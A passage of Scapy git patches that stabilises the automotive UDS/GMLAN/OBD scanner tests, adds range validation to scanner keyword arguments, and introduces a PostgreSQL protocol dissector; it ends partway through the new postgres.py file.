test_cases=enumerators, timeout=0.2, retry_if_none_received=True, unittest=True, **kwargs) - for i in range(100): + for i in range(12): scanner.scan(timeout=10) if scanner.scan_completed: print("Scan completed after %d iterations" % i) @@ -65,6 +65,7 @@ def executeScannerInVirtualEnvironment(supported_responses, enumerators, **kwarg tester.send(Raw(b"\xff\xff\xff")) sim.join(timeout=2) assert not sim.is_alive() + cleanup_testsockets() return scanner = Load packets from candump diff --git a/test/contrib/automotive/obd/scanner.uts b/test/contrib/automotive/obd/scanner.uts index c4a6c273fbc..407d5dee94b 100644 --- a/test/contrib/automotive/obd/scanner.uts +++ b/test/contrib/automotive/obd/scanner.uts @@ -101,11 +101,11 @@ responses = [ sniff(timeout=0.001, opened_socket=[ecu, tester]) answering_machine = EcuAnsweringMachine(supported_responses=responses, main_socket=ecu, basecls=OBD) -sim = threading.Thread(target=answering_machine, kwargs={"timeout": 50, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) +sim = threading.Thread(target=answering_machine, kwargs={"timeout": 100, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) sim.start() try: s = OBD_Scanner(tester, full_scan=False, timeout=1, retry_if_none_received=True) - s.scan() + s.scan(timeout=100) tester.send(b"\xff\xff\xff") finally: sim.join(timeout=10) @@ -144,11 +144,11 @@ assert len(s.enumerators[7].results_with_response) == 1 # 1 PR sniff(timeout=0.001, opened_socket=[ecu, tester]) answering_machine = EcuAnsweringMachine(supported_responses=responses, main_socket=ecu, basecls=OBD) -sim = threading.Thread(target=answering_machine, kwargs={"timeout": 50, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) +sim = threading.Thread(target=answering_machine, kwargs={"timeout": 100, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) sim.start() try: s = OBD_Scanner(tester, full_scan=True, timeout=1, retry_if_none_received=True) - s.scan() + s.scan(timeout=100) tester.send(b"\xff\xff\xff") finally: sim.join(timeout=10) @@ -188,11 +188,11 @@ assert len(s.enumerators[7].results_with_response) == 1 # 1 PR sniff(timeout=0.001, opened_socket=[ecu, tester]) answering_machine = EcuAnsweringMachine(supported_responses=responses, main_socket=ecu, basecls=OBD) -sim = threading.Thread(target=answering_machine, kwargs={"timeout": 50, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) +sim = threading.Thread(target=answering_machine, kwargs={"timeout": 100, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) sim.start() try: s = OBD_Scanner(tester, test_cases=[OBD_S01_Enumerator], full_scan=False, retry_if_none_received=True, timeout=1) - s.scan() + s.scan(timeout=100) tester.send(b"\xff\xff\xff") finally: sim.join(timeout=10) diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 63cc9cba732..247e0f1cd54 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -70,6 +70,8 @@ def executeScannerInVirtualEnvironment(supported_responses, enumerators, unstabl answering_machine_running.clear() tester.send(Raw(b"\xff\xff\xff")) sim.join(timeout=2) + assert not sim.is_alive() + cleanup_testsockets() if six.PY3 and LINUX: pickle_test(scanner) return scanner @@ -161,6 +163,7 @@ try: finally: tester.send(Raw(b"\xff\xff\xff")) sim.join(timeout=2) + cleanup_testsockets() = Simulate ECU and run Scanner diff --git a/test/testsocket.py b/test/testsocket.py index f8827b8c57a..884341516c3 100644 --- a/test/testsocket.py +++ b/test/testsocket.py @@ -8,6 +8,7 @@ import time import random +from socket import socket from scapy.config import conf from scapy.automaton import ObjectPipe, select_objects @@ -21,9 +22,7 @@ open_test_sockets = list() # type: List[TestSocket] -class TestSocket(ObjectPipe[Packet], SuperSocket): - nonblocking_socket = False # type: bool - +class TestSocket(SuperSocket): def __init__(self, basecls=None): # type: (Optional[Type[Packet]]) -> None global open_test_sockets @@ -31,6 +30,7 @@ def __init__(self, basecls=None): self.basecls = basecls self.paired_sockets = list() # type: List[TestSocket] self.closed = False + self.ins = self.outs = cast(socket, ObjectPipe(name="TestSocket")) open_test_sockets.append(self) def __enter__(self): @@ -66,7 +66,7 @@ def send(self, x): # type: (Packet) -> int sx = bytes(x) for r in self.paired_sockets: - super(TestSocket, r).send(sx) # type: ignore + r.ins.send(sx) try: x.sent_time = time.time() except AttributeError: @@ -76,24 +76,16 @@ def send(self, x): def recv_raw(self, x=MTU): # type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] # noqa: E501 """Returns a tuple containing (cls, pkt_data, time)""" - return self.basecls, \ - super(TestSocket, self).recv(), \ - time.time() + return self.basecls, self.ins.recv(0), time.time() - def recv(self, x=MTU): # type: ignore - # type: (int) -> Optional[Packet] - return SuperSocket.recv(self, x=x) + def __del__(self): + # type: () -> None + self.close() @staticmethod def select(sockets, remain=conf.recv_poll_rate): # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] - sock = [s for s in sockets if isinstance(s, ObjectPipe) and - not s.closed] - return cast(List[SuperSocket], select_objects(sock, remain)) - - def __del__(self): - # type: () -> None - self.close() + return select_objects(sockets, remain) class UnstableSocket(TestSocket): @@ -118,7 +110,7 @@ def send(self, x): self.last_tx_was_error = False return super(UnstableSocket, self).send(x) - def recv(self, x=MTU): # type: ignore + def recv(self, x=MTU): # type: (int) -> Optional[Packet] if not self.last_rx_was_error: if random.randint(0, 1000) == 42: From 2e37b98ce6e49fc37eae095ee506e31ab6507b5a Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 8 Jul 2022 10:10:58 +0200 Subject: [PATCH 0846/1632] Further stabilizations for automotive scanner tests (#3681) * Further stabilizations for automotive scanner tests * add no error count from the beginning onward * close Testsockets --- test/contrib/automotive/gm/scanner.uts | 4 ++++ .../automotive/scanner/uds_scanner.uts | 10 +++++++- test/testsocket.py | 24 ++++++++++--------- 3 files changed, 26 insertions(+), 12 deletions(-) diff --git a/test/contrib/automotive/gm/scanner.uts b/test/contrib/automotive/gm/scanner.uts index e8237249263..cbd956de824 100644 --- a/test/contrib/automotive/gm/scanner.uts +++ b/test/contrib/automotive/gm/scanner.uts @@ -39,6 +39,10 @@ def executeScannerInVirtualEnvironment(supported_responses, enumerators, **kwarg global answering_machine while answering_machine_running.is_set(): try: + try: + ecu.close() + except Exception: + pass ecu = TestSocket(GMLAN) tester.pair(ecu) answering_machine = EcuAnsweringMachine(supported_responses=supported_responses, main_socket=ecu, basecls=GMLAN, verbose=False) diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 247e0f1cd54..139bb852093 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -37,6 +37,10 @@ def executeScannerInVirtualEnvironment(supported_responses, enumerators, unstabl sniff(timeout=0.001, opened_socket=[ecu, tester]) def reconnect(): global tester + try: + tester.close() + except Exception: + pass tester = TesterSocket(UDS) ecu.pair(tester) return tester @@ -45,6 +49,10 @@ def executeScannerInVirtualEnvironment(supported_responses, enumerators, unstabl global answering_machine while answering_machine_running.is_set(): try: + try: + ecu.close() + except Exception: + pass ecu = TestSocket(UDS) tester.pair(ecu) answering_machine = EcuAnsweringMachine(supported_responses=supported_responses, main_socket=ecu, basecls=UDS, verbose=False) @@ -68,7 +76,7 @@ def executeScannerInVirtualEnvironment(supported_responses, enumerators, unstabl break finally: answering_machine_running.clear() - tester.send(Raw(b"\xff\xff\xff")) + ecu.ins.send(Raw(b"\xff\xff\xff")) sim.join(timeout=2) assert not sim.is_alive() cleanup_testsockets() diff --git a/test/testsocket.py b/test/testsocket.py index 884341516c3..7efa89996c2 100644 --- a/test/testsocket.py +++ b/test/testsocket.py @@ -97,35 +97,37 @@ class UnstableSocket(TestSocket): def __init__(self, basecls=None): # type: (Optional[Type[Packet]]) -> None super(UnstableSocket, self).__init__(basecls) - self.last_rx_was_error = False - self.last_tx_was_error = False + self.no_error_for_x_rx_pkts = 10 + self.no_error_for_x_tx_pkts = 10 def send(self, x): # type: (Packet) -> int - if not self.last_tx_was_error: + if self.no_error_for_x_tx_pkts == 0: if random.randint(0, 1000) == 42: - self.last_tx_was_error = True + self.no_error_for_x_tx_pkts = 10 print("SOCKET CLOSED") raise OSError("Socket closed") - self.last_tx_was_error = False + if self.no_error_for_x_tx_pkts > 0: + self.no_error_for_x_tx_pkts -= 1 return super(UnstableSocket, self).send(x) def recv(self, x=MTU): # type: (int) -> Optional[Packet] - if not self.last_rx_was_error: + if self.no_error_for_x_tx_pkts == 0: if random.randint(0, 1000) == 42: - self.last_rx_was_error = True + self.no_error_for_x_tx_pkts = 10 raise OSError("Socket closed") if random.randint(0, 1000) == 13: - self.last_rx_was_error = True + self.no_error_for_x_tx_pkts = 10 raise Scapy_Exception("Socket closed") if random.randint(0, 1000) == 7: - self.last_rx_was_error = True + self.no_error_for_x_tx_pkts = 10 raise ValueError("Socket closed") if random.randint(0, 1000) == 113: - self.last_rx_was_error = True + self.no_error_for_x_tx_pkts = 10 return None - self.last_rx_was_error = False + if self.no_error_for_x_tx_pkts > 0: + self.no_error_for_x_tx_pkts -= 1 return super(UnstableSocket, self).recv(x) From 0466ed058024acc3be27544d6824ad37b076bf89 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 11 Jul 2022 22:05:41 +0200 Subject: [PATCH 0847/1632] Add value validation to automotive scanners (#3682) * Add value validation to automotive scanners * fix mypy,flake * fix unit tests * fix unit tests * fix unit tests --- scapy/contrib/automotive/gm/gmlan_scanner.py | 10 ++-- scapy/contrib/automotive/obd/scanner.py | 2 +- .../contrib/automotive/scanner/enumerator.py | 25 +++++----- scapy/contrib/automotive/scanner/executor.py | 11 ++++- scapy/contrib/automotive/scanner/test_case.py | 13 +++-- scapy/contrib/automotive/uds_scan.py | 48 +++++++++++++++---- .../contrib/automotive/scanner/enumerator.uts | 6 +++ test/contrib/automotive/scanner/test_case.uts | 2 +- .../automotive/scanner/uds_scanner.uts | 11 +++++ 9 files changed, 96 insertions(+), 32 deletions(-) diff --git a/scapy/contrib/automotive/gm/gmlan_scanner.py b/scapy/contrib/automotive/gm/gmlan_scanner.py index d3b9c48b4dc..bba8f01cfa1 100644 --- a/scapy/contrib/automotive/gm/gmlan_scanner.py +++ b/scapy/contrib/automotive/gm/gmlan_scanner.py @@ -226,7 +226,7 @@ class GMLAN_WDBIEnumerator(GMLAN_Enumerator): _description = "Writeable data identifier per state" _supported_kwargs = copy.copy(GMLAN_Enumerator._supported_kwargs) _supported_kwargs.update({ - 'rdbi_enumerator': GMLAN_RDBIEnumerator + 'rdbi_enumerator': (GMLAN_RDBIEnumerator, None) }) _supported_kwargs_doc = ServiceEnumerator._supported_kwargs_doc + """ @@ -284,7 +284,7 @@ class GMLAN_SAEnumerator(GMLAN_Enumerator, StateGenerator): _transition_function_args = dict() # type: Dict[_Edge, Tuple[int, Optional[Callable[[int], int]]]] # noqa: E501 _supported_kwargs = copy.copy(GMLAN_Enumerator._supported_kwargs) _supported_kwargs.update({ - 'keyfunction': None + 'keyfunction': (None, None) }) _supported_kwargs_doc = ServiceEnumerator._supported_kwargs_doc + """ @@ -564,9 +564,9 @@ class GMLAN_RMBAEnumerator(GMLAN_Enumerator): _supported_kwargs = copy.copy(GMLAN_Enumerator._supported_kwargs) _supported_kwargs.update({ - 'probe_width': int, - 'random_probes_len': int, - 'sequential_probes_len': int + 'probe_width': (int, lambda x: x >= 0), + 'random_probes_len': (int, lambda x: x >= 0), + 'sequential_probes_len': (int, lambda x: x >= 0) }) _supported_kwargs_doc = GMLAN_Enumerator._supported_kwargs_doc + """ diff --git a/scapy/contrib/automotive/obd/scanner.py b/scapy/contrib/automotive/obd/scanner.py index ea4141025c0..2efac6c0912 100644 --- a/scapy/contrib/automotive/obd/scanner.py +++ b/scapy/contrib/automotive/obd/scanner.py @@ -29,7 +29,7 @@ class OBD_Enumerator(ServiceEnumerator): _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) _supported_kwargs.update({ - 'full_scan': bool, + 'full_scan': (bool, None), }) _supported_kwargs_doc = ServiceEnumerator._supported_kwargs_doc + """ diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index e04ee346341..a2d0653c0f1 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -53,18 +53,19 @@ class ServiceEnumerator(AutomotiveTestCase): _supported_kwargs = copy.copy(AutomotiveTestCase._supported_kwargs) _supported_kwargs.update({ - 'timeout': (int, float), - 'count': int, - 'execution_time': int, - 'state_allow_list': (list, EcuState), - 'state_block_list': (list, EcuState), - 'retry_if_none_received': bool, - 'exit_if_no_answer_received': bool, - 'exit_if_service_not_supported': bool, - 'exit_scan_on_first_negative_response': bool, - 'retry_if_busy_returncode': bool, - 'debug': bool, - 'scan_range': (list, tuple, range) + 'timeout': ((int, float), lambda x: x >= 0), + 'count': (int, lambda x: x >= 0), + 'execution_time': (int, None), + 'state_allow_list': ((list, EcuState), None), + 'state_block_list': ((list, EcuState), None), + 'retry_if_none_received': (bool, None), + 'exit_if_no_answer_received': (bool, None), + 'exit_if_service_not_supported': (bool, None), + 'exit_scan_on_first_negative_response': (bool, None), + 'retry_if_busy_returncode': (bool, None), + 'debug': (bool, None), + 'scan_range': ((list, tuple, range), None), + 'unittest': (bool, None) }) _supported_kwargs_doc = AutomotiveTestCase._supported_kwargs_doc + """ diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index c171a8817f5..66eaa96e79b 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -22,7 +22,8 @@ from scapy.contrib.automotive.scanner.configuration import \ AutomotiveTestCaseExecutorConfiguration from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCaseABC, \ - _SocketUnion, _CleanupCallable, StateGenerator, TestCaseGenerator + _SocketUnion, _CleanupCallable, StateGenerator, TestCaseGenerator, \ + AutomotiveTestCase @six.add_metaclass(abc.ABCMeta) @@ -72,6 +73,7 @@ def __init__( self.configuration = AutomotiveTestCaseExecutorConfiguration( test_cases or self.default_test_case_clss, **kwargs) + self.validate_test_case_kwargs() def __reduce__(self): # type: ignore f, t, d = super(AutomotiveTestCaseExecutor, self).__reduce__() # type: ignore # noqa: E501 @@ -203,6 +205,13 @@ def check_new_states(self, test_case): tf = test_case.get_transition_function(self.socket, edge) self.state_graph.add_edge(edge, tf) + def validate_test_case_kwargs(self): + # type: () -> None + for test_case in self.configuration.test_cases: + if isinstance(test_case, AutomotiveTestCase): + test_case_kwargs = self.configuration[test_case.__class__.__name__] + test_case.check_kwargs(test_case_kwargs) + def scan(self, timeout=None): # type: (Optional[int]) -> None """ diff --git a/scapy/contrib/automotive/scanner/test_case.py b/scapy/contrib/automotive/scanner/test_case.py index 99f2bcda829..a4d30bd582e 100644 --- a/scapy/contrib/automotive/scanner/test_case.py +++ b/scapy/contrib/automotive/scanner/test_case.py @@ -43,7 +43,7 @@ class AutomotiveTestCaseABC: state, the TestCase object gets executed. """ - _supported_kwargs = {} # type: Dict[str, Any] + _supported_kwargs = {} # type: Dict[str, Tuple[Any, Optional[Callable[[Any], bool]]]] # noqa: E501 _supported_kwargs_doc = "" @abc.abstractmethod @@ -158,12 +158,19 @@ def check_kwargs(cls, kwargs): # type: (Dict[str, Any]) -> None for k, v in kwargs.items(): if k not in cls._supported_kwargs.keys(): - raise Scapy_Exception("Keyword-Argument %s not supported" % k) - ti = cls._supported_kwargs[k] + raise Scapy_Exception( + "Keyword-Argument %s not supported for %s" % + (k, cls.__name__)) + ti, vf = cls._supported_kwargs[k] if ti is not None and not isinstance(v, ti): raise Scapy_Exception( "Keyword-Value '%s' is not instance of type %s" % (k, str(ti))) + if vf is not None and not vf(v): + raise Scapy_Exception( + "Validation Error: '%s: %s' is not in the allowed " + "value range" % (k, str(v)) + ) @property def completed(self): diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index 638eb5dbb3c..fffc52f8680 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -82,9 +82,11 @@ class UDS_DSCEnumerator(UDS_Enumerator, StateGeneratingServiceEnumerator): _description = "Available sessions" _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) _supported_kwargs.update({ - 'delay_state_change': int, - 'overwrite_timeout': bool + 'delay_state_change': (int, lambda x: x >= 0), + 'overwrite_timeout': (bool, None) }) + _supported_kwargs["scan_range"] = ( + (list, tuple, range), lambda x: max(x) < 0x100 and min(x) >= 0) _supported_kwargs_doc = ServiceEnumerator._supported_kwargs_doc + """ :param int delay_state_change: Specifies an additional delay after @@ -230,6 +232,9 @@ def get_transition_function(self, socket, edge): class UDS_EREnumerator(UDS_Enumerator): _description = "ECUReset supported" + _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) + _supported_kwargs["scan_range"] = \ + ((list, tuple, range), lambda x: max(x) < 0x100 and min(x) >= 0) def _get_initial_requests(self, **kwargs): # type: (Any) -> Iterable[Packet] @@ -244,6 +249,9 @@ def _get_table_entry_y(self, tup): class UDS_CCEnumerator(UDS_Enumerator): _description = "CommunicationControl supported" + _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) + _supported_kwargs["scan_range"] = \ + ((list, tuple, range), lambda x: max(x) < 0x100 and min(x) >= 0) def _get_initial_requests(self, **kwargs): # type: (Any) -> Iterable[Packet] @@ -260,6 +268,9 @@ def _get_table_entry_y(self, tup): class UDS_RDBPIEnumerator(UDS_Enumerator): _description = "ReadDataByPeriodicIdentifier supported" + _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) + _supported_kwargs["scan_range"] = ( + (list, tuple, range), lambda x: max(x) < 0x100 and min(x) >= 0) def _get_initial_requests(self, **kwargs): # type: (Any) -> Iterable[Packet] @@ -283,6 +294,9 @@ def _get_table_entry_y(self, tup): class UDS_ServiceEnumerator(UDS_Enumerator): _description = "Available services and negative response per state" + _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) + _supported_kwargs["scan_range"] = \ + ((list, tuple, range), lambda x: max(x) < 0x100 and min(x) >= 0) def _get_initial_requests(self, **kwargs): # type: (Any) -> Iterable[Packet] @@ -316,6 +330,9 @@ def _get_table_entry_y(self, tup): class UDS_RDBIEnumerator(UDS_Enumerator): _description = "Readable data identifier per state" + _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) + _supported_kwargs["scan_range"] = \ + ((list, tuple, range), lambda x: max(x) < 0x10000 and min(x) >= 0) def _get_initial_requests(self, **kwargs): # type: (Any) -> Iterable[Packet] @@ -381,8 +398,8 @@ def __init__(self): class UDS_RDBIRandomEnumerator(UDS_RDBIEnumerator): _supported_kwargs = copy.copy(UDS_RDBIEnumerator._supported_kwargs) _supported_kwargs.update({ - 'probe_start': int, - 'probe_end': int + 'probe_start': (int, lambda x: 0 <= x <= 0xffff), + 'probe_end': (int, lambda x: 0 <= x <= 0xffff) }) block_size = 2 ** 6 @@ -444,8 +461,10 @@ class UDS_WDBIEnumerator(UDS_Enumerator): _description = "Writeable data identifier per state" _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) _supported_kwargs.update({ - 'rdbi_enumerator': UDS_RDBIEnumerator + 'rdbi_enumerator': (UDS_RDBIEnumerator, None) }) + _supported_kwargs["scan_range"] = \ + ((list, tuple, range), lambda x: max(x) < 0x100 and min(x) >= 0) _supported_kwargs_doc = ServiceEnumerator._supported_kwargs_doc + """ :param rdbi_enumerator: Specifies an instance of an UDS_RDBIEnumerator @@ -503,6 +522,9 @@ def __init__(self): class UDS_SAEnumerator(UDS_Enumerator): _description = "Available security seeds with access type and state" + _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) + _supported_kwargs["scan_range"] = \ + ((list, tuple, range), lambda x: max(x) < 0x100 and min(x) >= 0) def _get_initial_requests(self, **kwargs): # type: (Any) -> Iterable[Packet] @@ -728,8 +750,10 @@ class UDS_RCEnumerator(UDS_Enumerator): _description = "Available RoutineControls and negative response per state" _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) _supported_kwargs.update({ - 'type_list': list + 'type_list': (list, lambda x: max(x) < 0x100 and min(x) >= 0) }) + _supported_kwargs["scan_range"] = \ + ((list, tuple, range), lambda x: max(x) < 0x10000 and min(x) >= 0) _supported_kwargs_doc = ServiceEnumerator._supported_kwargs_doc + """ :param list type_list: A list of RoutineControlTypes which should @@ -805,6 +829,9 @@ def __init__(self): class UDS_IOCBIEnumerator(UDS_Enumerator): _description = "Available Input Output Controls By Identifier " \ "and negative response per state" + _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) + _supported_kwargs["scan_range"] = \ + ((list, tuple, range), lambda x: max(x) < 0x10000 and min(x) >= 0) def _get_initial_requests(self, **kwargs): # type: (Any) -> Iterable[Packet] @@ -878,7 +905,7 @@ def _get_table_entry_z(self, tup): class UDS_RMBARandomEnumerator(UDS_RMBAEnumeratorABC): _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) _supported_kwargs.update({ - 'unittest': bool + 'unittest': (bool, None) }) _supported_kwargs_doc = ServiceEnumerator._supported_kwargs_doc + """ @@ -921,7 +948,7 @@ def _get_initial_requests(self, **kwargs): class UDS_RMBASequentialEnumerator(UDS_RMBAEnumeratorABC): _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) _supported_kwargs.update({ - 'points_of_interest': list + 'points_of_interest': (list, None) }) _supported_kwargs_doc = ServiceEnumerator._supported_kwargs_doc + """ @@ -1098,7 +1125,7 @@ class UDS_RDEnumerator(UDS_Enumerator): _description = "RequestDownload supported" _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) _supported_kwargs.update({ - 'unittest': bool + 'unittest': (bool, None) }) _supported_kwargs_doc = ServiceEnumerator._supported_kwargs_doc + """ @@ -1144,6 +1171,9 @@ def _get_table_entry_y(self, tup): class UDS_TDEnumerator(UDS_Enumerator): _description = "TransferData supported" + _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) + _supported_kwargs["scan_range"] = \ + ((list, tuple, range), lambda x: max(x) < 0x100 and min(x) >= 0) def _get_initial_requests(self, **kwargs): # type: (Any) -> Iterable[Packet] diff --git a/test/contrib/automotive/scanner/enumerator.uts b/test/contrib/automotive/scanner/enumerator.uts index e647371e663..c37d15549f5 100644 --- a/test/contrib/automotive/scanner/enumerator.uts +++ b/test/contrib/automotive/scanner/enumerator.uts @@ -26,6 +26,12 @@ pkts = [ ] class MyTestCase(ServiceEnumerator): + _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) + _supported_kwargs.update({ + 'local_kwarg': ((int, str), None), + 'verbose': (bool, None), + 'global_arg': (str, None) + }) def _get_initial_requests(self, **kwargs): # type: (Any) -> Iterable[Packet] return UDS(service=range(1, 11)) diff --git a/test/contrib/automotive/scanner/test_case.uts b/test/contrib/automotive/scanner/test_case.uts index 3dd43daac28..f910be6e457 100644 --- a/test/contrib/automotive/scanner/test_case.uts +++ b/test/contrib/automotive/scanner/test_case.uts @@ -13,7 +13,7 @@ from scapy.contrib.automotive.ecu import EcuState class MyTestCase(AutomotiveTestCase): _description = "MyTestCase" - _supported_kwargs = {"testarg": int} + _supported_kwargs = {"testarg": (int, None)} def supported_responses(self): return [] diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 139bb852093..c644886f864 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -174,6 +174,17 @@ finally: cleanup_testsockets() += Test configuration validation + +try: + scanner = UDS_Scanner(TestSocket(UDS), + test_cases=[UDS_SA_XOR_Enumerator, UDS_DSCEnumerator, UDS_ServiceEnumerator], + UDS_DSCEnumerator_kwargs={"scan_range": range(0x1000), "delay_state_change": 0, + "overwrite_timeout": False}) + assert False +except Scapy_Exception: + pass + = Simulate ECU and run Scanner scanner = executeScannerInVirtualEnvironment( From 3c2e62f96818f1dbab8e15d0be7e065e65f7b62d Mon Sep 17 00:00:00 2001 From: Anthony Shaw Date: Tue, 12 Jul 2022 16:30:32 +1000 Subject: [PATCH 0848/1632] Implement Postgres line protocol 3.0 (#3601) * Start on a postgres protocol layer * Add more enumerations * accept multiple messages in packet * Update gitignore * Start a data row and description packet desc * DataRow * rename ready packet. test a pcap * data row packet * More payload implementations. Added layer bindings * Format the file with black * Implements DataRow correctly, PasswordMessage and Execute * Implement more of the stack and refactor tests into UTS format * Remove saved pcap file * Make the tag field a constant and change the field len field to have None to correctly assert the field size * Correct the padding of queries, correct the error and notice response packets. Formatting * Update some of the length fields * Fix dynamic packet lengths. Implement CancelRequest, Parse * Remove an internal testing script * Add imports for test script * Python type hints as comments * Python 2 compatibility * Code quality updates * Simpler Python 2/3 compatible byte slicing * Implement copy protocol and add tests * Format the main module * Write a special field for options as dictionary to make it easier to test * File formatting * Patch flake8 violations * SPDX license Co-authored-by: gpotter2 --- .gitignore | 2 + scapy/contrib/postgres.py | 773 ++++++++++++++++++++++++++++++++++++++ test/contrib/postgres.uts | 240 ++++++++++++ 3 files changed, 1015 insertions(+) create mode 100644 scapy/contrib/postgres.py create mode 100644 test/contrib/postgres.uts diff --git a/.gitignore b/.gitignore index 5d2ab2f390f..34b606d3ceb 100644 --- a/.gitignore +++ b/.gitignore @@ -11,5 +11,7 @@ test/*.html .ipynb_checkpoints .mypy_cache .vscode +[.]venv/ +__pycache__/ doc/scapy/_build doc/scapy/api diff --git a/scapy/contrib/postgres.py b/scapy/contrib/postgres.py new file mode 100644 index 00000000000..eec7fcc0555 --- /dev/null +++ b/scapy/contrib/postgres.py @@ -0,0 +1,773 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information + +# scapy.contrib.description = Postgres PSQL Binary Protocol +# scapy.contrib.status = loads + +import struct + +from scapy.compat import Optional, Callable, Any, \ + Tuple # noqa: F401 +from scapy.fields import ( + ByteField, + CharEnumField, + Field, + FieldLenField, + FieldListField, + IntEnumField, + PacketListField, + ShortField, + SignedIntField, + SignedShortField, + StrField, + StrLenField, + StrNullField, +) +from scapy.packet import Packet, bind_layers +from scapy.layers.inet import TCP + +AUTH_CODES = { + 0: "AuthenticationOk", + 1: "AuthenticationKerberosV4", + 2: "AuthenticationKerberosV5", + 3: "AuthenticationCleartextPassword", + 4: "AuthenticationCryptPassword", + 5: "AuthenticationMD5Password", + 6: "AuthenticationSCMCredential", + 7: "AuthenticationGSS", + 8: "AuthenticationGSSContinue", + 9: "AuthenticationSSPI", + 10: "AuthenticationSASL", + 11: "AuthenticationSASLContinue", + 12: "AuthenticationSASLFinal", +} + + +class KeepAlive(Packet): + name = "Keep Alive" + fields_desc = [ + SignedIntField("len", 4), + ] + + +class SSLRequest(Packet): + name = "SSL request code message" + fields_desc = [ + FieldLenField("length", None, fmt="I"), + SignedIntField("request_code", 80877103), + ] + + +class _DictStrField(StrField): + """Takes a dictionary as an argument and packs back into a byte string.""" + + def i2m(self, pkt, x): + if isinstance(x, bytes): + return x + if isinstance(x, dict): + result = bytes() + for k, v in x.items(): + result += k + b"\x00" + v + b"\x00" + return result + b"\x00" + else: + return super(_DictStrField, self).i2m(pkt, x) + + def i2len(self, pkt, x): + # type: (Optional[Packet], Any) -> int + if x is None: + return 0 + return len(self.i2m(pkt, x)) + + +class Startup(Packet): + name = "Startup Request Packet" + fields_desc = [ + FieldLenField( + "len", None, length_of="options", + fmt="I", adjust=lambda pkt, x: x + 8 + ), + ShortField("protocol_version_major", 3), + ShortField("protocol_version_minor", 0), + _DictStrField("options", None), + ] + + +class _FieldsLenField(Field[int, int]): + """Same as FieldLenField but takes a tuple of fields for length_of.""" + + __slots__ = ["length_of", "adjust"] + + def __init__( + self, + name, # type: str + default, # type: Optional[Any] + length_of=None, # type: Optional[Tuple[str]] + fmt="H", # type: str + adjust=lambda pkt, x: x, # type: Callable[[Packet, int], int] + ): + # type: (...) -> None + super(_FieldsLenField, self).__init__(name, default, fmt) + self.length_of = length_of + self.adjust = adjust + + def i2m(self, pkt, x): + # type: (Optional[Packet], Optional[int]) -> int + if x is None and pkt is not None: + if self.length_of is not None: + f = 0 + for length_of_field in self.length_of: + fld, fval = pkt.getfield_and_val(length_of_field) + f += fld.i2len(pkt, fval) + else: + raise ValueError( + "Field should have either length_of or count_of") + x = self.adjust(pkt, f) + elif x is None: + x = 0 + return x + + +def determine_pg_field(pkt, lst, cur, remain): + key = b"" + if remain: + key = remain[0:1] # Python 2/3 compat + if key in pkt.cls_mapping: + return pkt.cls_mapping[key] + elif remain[0:1] == b"\x00" and len(remain) >= 4: + length = struct.unpack("!I", remain[0:3])[0] + if length == 0: + return KeepAlive + elif length == 8: + return SSLRequest + else: + return Startup + else: + return None + + +class ByteTagField(ByteField): + def __init__( + self, default # type: bytes + ): + super(ByteTagField, self).__init__("tag", ord(default)) + + def randval(self): + return ord(self.default) + + +class _BasePostgres(Packet): + name = "Regular packet" + fields_desc = [ + PacketListField("contents", [], next_cls_cb=determine_pg_field) + ] + + @classmethod + def tcp_reassemble(cls, data, metadata): + if data and data[0:1] == b"\x00": + length = struct.unpack("!I", data[0:3])[0] + if length == 8: + return SSLRequest(data) + else: + return Startup(data) + else: + return cls(data) + + +class _ZeroPadding(Packet): + def extract_padding(self, p): + return b"", p + + +class Authentication(_ZeroPadding): + name = "Authentication Request" + fields_desc = [ + ByteTagField(b"R"), + FieldLenField( + "len", None, length_of="optional", + fmt="I", 